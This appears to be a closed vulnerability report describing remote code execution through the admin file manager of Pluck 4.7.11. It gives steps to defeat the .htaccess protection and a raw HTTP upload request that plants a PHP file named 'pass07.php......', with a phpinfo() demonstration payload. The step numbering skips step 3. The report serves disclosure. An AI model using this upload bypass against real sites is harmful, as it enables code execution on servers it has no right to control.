Closed
Description
Pluck-4.7.11 admin background exists a remote command execution vulnerability when uploading files
Proof
step1: login -> pages -> manage files
upload .htaccess file to turn files/.htaccess to .htaccess.txt

step2: throw .htaccess.txt into trash

POST /pluck4711/admin.php?action=files HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------18467633426500
Content-Length: 339
Connection: close
Referer: http://127.0.0.1/pluck4711/admin.php?action=files
Cookie: PHPSESSID=50oi7cqaj4hrmj6pqiufa57lij
Upgrade-Insecure-Requests: 1
-----------------------------18467633426500
Content-Disposition: form-data; name="filefile"; filename="pass07.php......"
Content-Type: application/octet-stream
<?php echo phpinfo();?>
-----------------------------18467633426500
Content-Disposition: form-data; name="submit"
Upload
-----------------------------18467633426500--
step4: view http://127.0.0.1/pluck4711/files/pass07.php


